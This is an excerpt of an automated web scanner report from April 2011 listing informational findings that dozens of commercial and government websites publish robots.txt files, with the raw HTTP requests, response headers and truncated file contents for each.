Date: Sat, 02 Apr 2011 13:26:47 GMT
X-Varnish: 827895412 824165795
Age: 32563
Via: 1.1 varnish
Connection: close

User-Agent: *
Disallow: /directory.bml

Sitemap: http://www.livejournal.com/sitemap.xml

#
# Blocked journals aren't listed here because robots.txt files
# can't be above 50k or so, depending on the s
...[SNIP]...

24.488. http://www.livenation.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livenation.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.livenation.com

Response

HTTP/1.0 200 OK
Server: Apache
X-DC-Name: 1
Last-Modified: Mon, 14 Mar 2011 17:32:52 GMT
ETag: "646-b383d900"
Accept-Ranges: bytes
Content-Length: 1606
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:56:48 GMT
Connection: close
Set-Cookie: SID=kdnDjZQYi2eyfh7yYmje7kMk7SIGv3QOFAvmsnHv-6KHeD5toI2MTg4lZ-UZjzUKvuiy1L6tGcCqYube; path=/; domain=www.livenation.com
Set-Cookie: BID=f6zRPuY6IG6yLGU5eiKhLzhgp0Q6bMGL3qR1k_a5xBewcB-2Ab7gh4vGjGbXNSpvGH0OiUKHOWzHrJnCt8CJ; path=/; domain=www.livenation.com; expires=Fri, 01-Jan-2038 00:00:01 GMT
Set-Cookie: CMPS=L8t055KF6d9r9XjY0jB4G7R5z2Ztp+hU; path=/

User-agent: *
Disallow: /seatingchart
Disallow: /change_area
Disallow: /find_area
Disallow: /error
Disallow: /cgi/outsider.plx
Disallow: /cgi/sfxoutsider.plx
Disallow: /cgi/tt.plx
Disallow: /healthche
...[SNIP]...

24.489. http://www.llbean.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.llbean.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.llbean.com

Response

HTTP/1.0 200 OK
Last-Modified: Tue, 25 Jan 2011 06:56:14 GMT
ETag: "115ad3b-1cc-365a9f80"
Accept-Ranges: bytes
Content-Length: 460
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONo OUR DELa TRo IND PHY ONL UNI PUR FIN COM NAV DEM STA", policyref="/w3c/p3p.xml"
Content-Type: text/plain
Cache-Control: no-cache
Expires: Sat, 02 Apr 2011 13:34:27 GMT
Date: Sat, 02 Apr 2011 13:34:27 GMT
Connection: close

#
# robots.txt file for http://www.llbean.com
#

User-agent: *
Disallow: /js/
Disallow: /jsdata/
Disallow: /css/
Disallow: /kiosk/
Disallow: /buttons/
Disallow: /flash/
Disallow: /fsrscripts/
Disall
...[SNIP]...

24.490. http://www.loc.gov/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.loc.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.loc.gov

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:52:49 GMT
Server: Apache
Last-Modified: Thu, 16 Dec 2010 21:49:25 GMT
ETag: "589d-f4-6f96340"
Accept-Ranges: bytes
Content-Length: 244
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /web_arch/
Disallow: /rr/mopic/staff
Disallow: /loc/volunteers
Disallow: /ficmanagers
Disallow: /preserv/extranet/
Disallow: /myloc
Disallow: /nationalfilmr
...[SNIP]...

24.491. http://www.local.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.local.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Tue, 29 Mar 2011 22:35:01 GMT
ETag: "7145bc8a61eecb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Cteonnt-Length: 1224
Cache-Control: private, max-age=35123
Date: Sat, 02 Apr 2011 12:43:15 GMT
Content-Length: 1224
Connection: close

User-agent: SBIder
Disallow: /

User-agent: Twiceler-0.9
Disallow: /

User-agent: *
Disallow: /error.aspx
Disallow: /email.aspx
Disallow: /sms.aspx
Disallow: /print.aspx
Disallow: /logout.a
...[SNIP]...

24.492. http://www.localguides.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.localguides.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.localguides.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: .ASPXANONYMOUS=qY1xe84nzAEkAAAAYjMxM2JiZjUtZThhZi00OGQwLWE0MjgtYWY5ZjNkYmRkZTRklL09sHMC2bzF_wWMIjFubqiFrSA1; expires=Sat, 11-Jun-2011 00:28:27 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=ftqnscm1r11badawjibcxwno; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: UserID=ftqnscm1r11badawjibcxwno; domain=localguides.com; expires=Sun, 02-Oct-2011 13:48:27 GMT; path=/
X-Server: WEB01
X-Powered-By: ASP.NET
p3p: CP="NOI DSP COR CURa ADMa OUR NOR"
Date: Sat, 02 Apr 2011 13:48:27 GMT
Connection: close
Content-Length: 669

Sitemap: http://www.localguides.com/sitemap.xml

User-agent: *
Disallow: /ypcyellow/

User-agent: Mediapartners-Google
Disallow:

User-agent: Googlebot
Disallow:

User-agent: Slurp
Disallo
...[SNIP]...

24.493. http://www.localpages.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.localpages.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.localpages.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:24:21 GMT
Server: Apache
Last-Modified: Mon, 28 Mar 2011 20:34:53 GMT
ETag: "2a8738-39-49f90e03c5540"
Accept-Ranges: bytes
Content-Length: 57
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /ajaxGoogleMap.php
Allow: /


24.494. http://www.lowermybills.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lowermybills.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lowermybills.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:59 GMT
Server: Apache
Set-Cookie: SERVER_COOKIE=173.193.214.243.1301751119999871; path=/; expires=Mon, 01-Apr-13 13:31:59 GMT
Last-Modified: Wed, 30 Mar 2011 22:40:56 GMT
ETag: "56242-4a-49fbadeb54e00"
Accept-Ranges: bytes
Content-Length: 74
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain
Set-Cookie: BIGipServerpl.lmbprod=553918474.20480.0000; path=/

User-agent: *
Disallow: /images/
Disallow: /javascript/
Disallow: /style/

24.495. http://www.lowes.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lowes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lowes.com

Response

HTTP/1.0 200 OK
Last-Modified: Sun, 27 Mar 2011 04:26:08 GMT
Accept-Ranges: bytes
Content-Length: 465
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:24:35 GMT
Connection: close

# robots.txt for http://www.lowes.com/

User-agent: *
Disallow: /*cm_cr=*
Disallow: /*No=*
Disallow: /*rpp=*
Disallow: /*Ns=p_product_price*
Disallow: /*Ns=p_product_brand_name*
Disallow: /*Ns
...[SNIP]...

24.496. http://www.lowfares.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lowfares.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lowfares.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:42 GMT
Server: Apache/2.0.52 (CentOS)
Set-Cookie: sid=1; path=/; expires=Tue, 01-Apr-2014 14:05:42 GMT
Set-Cookie: pageview=0; path=/; expires=Sat, 02-Apr-2011 15:05:42 GMT
Content-Length: 37
P3P: policyref="/static/policy.xml", CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Connection: close


User-agent: *
Disallow: /rsshandler

24.497. http://www.lyrics007.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lyrics007.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lyrics007.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 18:16:49 GMT
Server: Apache/2.0.46 (Red Hat)
Last-Modified: Thu, 23 Oct 2008 12:29:34 GMT
ETag: "3480cc-5b-d1356780"
Accept-Ranges: bytes
Content-Length: 91
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 18:16:49 GMT
Connection: close
Content-Type: text/plain
Content-Language: en

User-agent: *
Disallow: /*?
User-agent: Googlebot
Disallow: /urlredirect*/
Disallow: /*?

24.498. http://www.lyricsmode.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lyricsmode.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lyricsmode.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 13:26:28 GMT
Content-Type: text/plain
Content-Length: 191
Last-Modified: Thu, 06 Aug 2009 08:51:24 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /?i=print_lyrics
Disallow: /favorites.php
Disallow: /i/scroll.swf
Disallow: /search.php
Disallow: /ringtones.php

Sitemap: http://www.lyricsmode.com/sitemap.xml

24.499. http://www.macraesbluebook.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.macraesbluebook.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.macraesbluebook.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 16 Mar 2011 20:58:44 GMT
Accept-Ranges: bytes
ETag: "b6fd5f01ce4cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:51:20 GMT
Connection: close
Content-Length: 67

User-agent: *
Disallow:

User-agent: gsa-crawler
Disallow: /

24.500. http://www.macrumors.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.macrumors.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.macrumors.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:36:37 GMT
Server: Apache/1.3.41 (Unix) PHP/4.4.9 mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_ssl/2.8.31 OpenSSL/0.9.8b
Last-Modified: Mon, 17 Nov 2008 12:12:38 GMT
ETag: "1e3801a-101-49215fb6"
Accept-Ranges: bytes
Content-Length: 257
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /c.php
Disallow: /members/c.php
Disallow: /page2/c.php
Disallow: /page2/t.php
Disallow: /rate.php3
Disallow: /dtlink.php
Disallow: /t.php
Disallow: /submit.php3
Disallow: /abou
...[SNIP]...

24.501. http://www.macys.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.macys.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.macys.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Fri, 25 Mar 2011 17:59:38 GMT
ETag: "3b0b1-7f-5b7e9680"
Cache-Control: max-age=0, no-cache
Pragma: no-cache
X-Cnection: close
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:26:32 GMT
Content-Length: 127
Connection: close
Set-Cookie: stop_mobi=yes; expires=Sat, 02-Apr-2011 13:56:32 GMT; path=/; domain=.macys.com

User-agent: *
Crawl-delay: 120
Disallow: /compare
Disallow: /registry/wedding/compare
Disallow: /catalog/product/zoom.jsp

24.502. http://www.made-in-china.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.made-in-china.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.made-in-china.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:03:08 GMT
Server: Apache
Last-Modified: Thu, 24 Mar 2011 12:23:47 GMT
ETag: "1f4877f-1d3-49f398c8f5ac0"
Accept-Ranges: bytes
Content-Length: 467
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

# created by Yongzhong Xie
# robots.txt for Made-in-China.com
# Do not delete this file ! Please contact xyz@focuschina.com
# <URL:http://www.robotstxt.org/wc/exclusion.html#robotstxt>
# Format is:
#
...[SNIP]...

24.503. http://www.mail.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mail.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mail.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:29 GMT
Server: Apache
Last-Modified: Wed, 01 Dec 2010 16:10:04 GMT
Accept-Ranges: bytes
Content-Length: 3547
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

Sitemap: http://www.mail.com/sitemapindex.xml
User-agent: *
Disallow: /*?ls=*
Disallow: /*?localePreference=*
Disallow: /*;jsessionid=*
Disallow: /*;kid=*
Disallow: /company/
Disallow: /int/company/


...[SNIP]...

24.504. http://www.mainstreet.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mainstreet.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mainstreet.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:04:45 GMT
Server: Apache
Last-Modified: Mon, 25 Feb 2008 02:18:25 GMT
ETag: "660-446f22fcf7e40"
Accept-Ranges: bytes
Content-Length: 1632
X-Debug: msweb04
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Id: robots.txt,v 1.7.2.2 2008/02/25 02:18:25 drumm Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by site
...[SNIP]...

24.505. http://www.manualsonline.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manualsonline.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.manualsonline.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:46:14 GMT
Server: Apache/2.2.14 (Fedora)
Last-Modified: Wed, 09 Feb 2011 21:36:47 GMT
ETag: "d746d9-56-49be04310d9c0"
Accept-Ranges: bytes
Content-Length: 86
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *

Disallow: /images/

Sitemap: http://www.manualsonline.com/sitemap.txt


24.506. http://www.mapquest.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mapquest.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mapquest.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: t_Id=ZGVmYXVsdDpudWxs; Path=/
Set-Cookie: tsession="uXWyZWtQOfvmKn3E//WwKePBgJ0="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Sat, 02-Apr-2011 13:07:31 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Sat, 02-Apr-2011 12:52:31 GMT; Path=/
Set-Cookie: psession="pvLd+an210uFXdeP0htNYY/wgmY="; Version=1; Domain=mapquest.com; Max-Age=7776000; Expires=Fri, 01-Jul-2011 12:37:31 GMT; Path=/
Set-Cookie: c_Id=MjMzOjM5Mw%3D%3D; Expires=Sat, 02-Apr-2011 13:07:31 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"77-1301684392000"
Last-Modified: Fri, 01 Apr 2011 18:59:52 GMT
Content-Type: text/plain
Content-Length: 77
Date: Sat, 02 Apr 2011 12:37:31 GMT
Connection: keep-alive

User-agent: *
Disallow: /print
Sitemap: http://www.mapquest.com/sitemap.xml

24.507. http://www.mapsofworld.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mapsofworld.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mapsofworld.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:50:32 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.25 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Thu, 24 Mar 2011 09:19:28 GMT
ETag: "f9060a-264-49f36f9646800"
Accept-Ranges: bytes
Content-Length: 612
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# robots.txt for http://www.mapsofworld.com/
User-agent: *
Disallow: /cgi-bin/ # This is an infinite virtual URL space
Disallow: /stats/ # these will soon disappear
Disallow: egypt/test/
Disallow
...[SNIP]...

24.508. http://www.marriott.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marriott.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.marriott.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server/6.1.0.33 Apache/2.0.47 (Unix) DAV/2
Last-Modified: Thu, 10 Jun 2010 18:54:07 GMT
ETag: "266a9-354-8c0b91c0"
Accept-Ranges: bytes
Content-Length: 852
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Content-Type: text/plain
Cache-Control: max-age=1902
Expires: Sat, 02 Apr 2011 14:05:15 GMT
Date: Sat, 02 Apr 2011 13:33:33 GMT
Connection: close

#
# Robots.txt file for Marriott.com
# Bans ALL robots from the accessing the following paths
#

User-agent: *
Disallow: /Channels/
Disallow: /reservation/
Disallow: /search/findHotels.mi
Dis
...[SNIP]...

24.509. http://www.marthastewart.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marthastewart.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.marthastewart.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 16 Feb 2011 15:51:32 GMT
ETag: "146db4-134-413ea900"
Cteonnt-Length: 308
Content-Type: text/plain
Cache-Control: private, max-age=116354
Date: Sat, 02 Apr 2011 13:34:19 GMT
Content-Length: 308
Connection: close

User-agent: *
Disallow: /portal/site/mslo/
Disallow: /vgn-ext-templating/v/
Disallow: /nav/
Disallow: /users/
Disallow: /static_html/
Disallow: /ace/
Disallow: /|/
Disallow: /most-popular-results
Disa
...[SNIP]...

24.510. http://www.marykay.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.marykay.com

Response

HTTP/1.1 200 OK
Content-Length: 695
Content-Type: text/plain
Last-Modified: Fri, 12 Feb 2010 15:34:34 GMT
Accept-Ranges: bytes
ETag: "a447d1e0f8abca1:a50fa"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=0DCD783041A90E3589652983111EFD79; Path=/; Domain=.marykay.com
Set-Cookie: TLTSID=0DCD783041A90E3589652983111EFD79; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Sat, 02 Apr 2011 14:18:37 GMT
Connection: close
Set-Cookie: www.marykay.com=1057692844.20480.0000; expires=Sat, 09-Apr-2011 14:18:37 GMT; path=/

# /robots.txt file for http://www.marykay.com/

User-agent: *
Disallow: /AddToBagRedirect.aspx
Disallow: /Customer404.aspx
Disallow: /CustomError.aspx
Disallow: /Gate.aspx
Disallow: /InTouchRed
...[SNIP]...

24.511. http://www.mastercard.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mastercard.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mastercard.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:27 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 21:03:04 GMT
ETag: "106c-aadb3200"
Accept-Ranges: bytes
Content-Length: 4204
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_xxx.nbtufsdbse.dpn-iuuq=ffffffff099ee93145525d5f4f58455e445a4a423660;expires=Sat, 02-Apr-2011 14:30:05 GMT;path=/;httponly

User-agent: *
Disallow: /cobrand/
Disallow: /cgi-bin/
Disallow: /cmsfiles/servlet/
Disallow: /businessplanning/financialresourceguide/
Disallow: /businessplanning/procurementoppguide/
Disallow:
...[SNIP]...

24.512. http://www.match.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.match.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.match.com

Response

HTTP/1.1 200 OK
Content-Length: 483
Content-Type: text/plain
Content-Location: http://www.match.com/robots.txt
Last-Modified: Thu, 24 Feb 2011 19:01:57 GMT
Accept-Ranges: bytes
ETag: "db94c4f55d4cb1:539"
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 12:38:11 GMT
Connection: close

User-agent: *
Disallow: /tools
Disallow: /redalert
Disallow: /bin
Disallow: /html
Disallow: /keynote
Disallow: /profile/
Disallow: /photos/
Disallow: /quizzes/
Disallow: /profilesettings/
Di
...[SNIP]...

24.513. http://www.mate1.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mate1.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mate1.net

Response

HTTP/1.0 200 OK
Date: Fri, 01 Apr 2011 19:48:47 GMT
Server: Apache
P3P: policyref="http://www.mate1.com/p3p/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Cache-Control: max-age=86400
Expires: Sat, 02 Apr 2011 19:48:47 GMT
Content-Type: text/plain
Age: 65624
Content-Length: 770
X-Cache: HIT from crtv4.mate1.com
Via: 1.1 crtv4.mate1.com:80 (squid/2.7.STABLE7)
Connection: close

User-agent: *
Disallow: /ad/
Disallow: /edate/
Disallow: /admin/
Disallow: /affiliates/
Disallow: /ambassadors/
Disallow: /c/
Disallow: /cj/
Disallow: /cj2/
Disallow: /crtv/
Disallow: /cj2/
Disallow:
...[SNIP]...

24.514. http://www.maxim.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.maxim.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.maxim.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.16 (Unix) mod_jk/1.2.28
Last-Modified: Wed, 03 Nov 2010 20:37:11 GMT
ETag: "240230f6-21-4942c0178abcf"
Accept-Ranges: bytes
Content-Length: 33
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:32:36 GMT
Connection: close

User-Agent: *
Disallow: /archive/

24.515. http://www.mayoclinic.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mayoclinic.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mayoclinic.com

Response

HTTP/1.1 200 OK
Content-Length: 2386
Content-Type: text/plain
Content-Location: http://www.mayoclinic.com/robots.txt
Last-Modified: Thu, 16 Apr 2009 21:00:40 GMT
Accept-Ranges: bytes
ETag: "20f46966d6bec91:6de"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:24:13 GMT
Connection: close

User-agent: *
Disallow: /images/billboardlarge/
Disallow: /images/billboardlargevertical/
Disallow: /images/billboards/
Disallow: /images/billboardSmall/
Disallow: /images/calculator/
Disallow:
...[SNIP]...

24.516. http://www.mcafee.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mcafee.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mcafee.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 07 Jan 2011 21:31:32 GMT
Accept-Ranges: bytes
ETag: "0128440b2aecb1:0"
Server: Microsoft-IIS/7.0
SN: SJV3
Date: Sat, 02 Apr 2011 13:43:28 GMT
Cache-Control: private, max-age=1800
Age: 0
Expires: Sat, 02 Apr 2011 14:13:28 GMT
x-cdn: Served by WebAcceleration
Connection: close

# directory exclusion used for mcafee.com
user-agent: *
#
#
# remove images
Disallow: /img/
Disallow: /*/img/
Disallow: /*/images/
#
# Disallow US expired files here (while waiting for region
...[SNIP]...

24.517. http://www.medcohealth.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.medcohealth.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.medcohealth.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:56:13 GMT
Last-Modified: Wed, 10 Sep 2003 18:34:08 GMT
Accept-Ranges: bytes
Content-Length: 2436
Connection: close
Content-Type: text/plain
Set-Cookie: TS2d8041=b73d5817b6cc284f76bfbf1a8510e0b602549166f7ba2baa4d972afd; Path=/

###############################
#
# robots.txt file for this www.medcohealth.com website
#
# addresses all robots by using wild card *
#
User-agent: *
#BEGIN List of JSPs under /consumer that needs to
...[SNIP]...

24.518. http://www.mediaite.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediaite.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mediaite.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 14:18:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Cookie
Set-Cookie: PHPSESSID=sfh8ikbsmhbo3rh4se44t6chm7; path=/
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.mediaite.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.mediaite.com/sitemap.xml.gz

24.519. http://www.medicalnewstoday.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.medicalnewstoday.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.medicalnewstoday.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:13:23 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Sat, 05 Mar 2011 11:17:11 GMT
ETag: "43003d-1f8-67651bc0"
Accept-Ranges: bytes
Content-Length: 504
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: Mediapartners-Google*
Disallow:

User-agent: Nutch
Crawl-delay: 5
Disallow:

User-agent: Slurp
Disallow: /*.gif$
Disallow: /*.jpg$

User-agent: *
Disallow: /images/
Disall
...[SNIP]...

24.520. http://www.medicare.gov/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.medicare.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.medicare.gov

Response

HTTP/1.1 200 OK
Content-Length: 3222
Content-Type: text/plain
Last-Modified: Thu, 21 Oct 2010 01:45:29 GMT
Accept-Ranges: bytes
ETag: "20651da4c170cb1:778"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:04:15 GMT
Connection: close

# robots.txt for http://www.medicare.gov

User-agent: *
Disallow: /XODOutput/
Disallow: /Templates/
Disallow: /Stylesheets/
Disallow: /Library/
Disallow: /Images/
Disallow: /_ScriptLibrary/
D
...[SNIP]...

24.521. http://www.medscape.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.medscape.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.medscape.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:15 GMT
Server: Apache
Vary: Host
Last-Modified: Thu, 17 Dec 2009 18:37:15 GMT
ETag: "159f09-70-47af0e97f0cc0"
Accept-Ranges: bytes
Content-Length: 112
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_xxx-xfc.qsg.qiy1:80=e2413a273660;expires=Sat, 02-Apr-11 15:14:15 GMT;path=/

User-agent: *

Disallow: /viewarticle/*_print
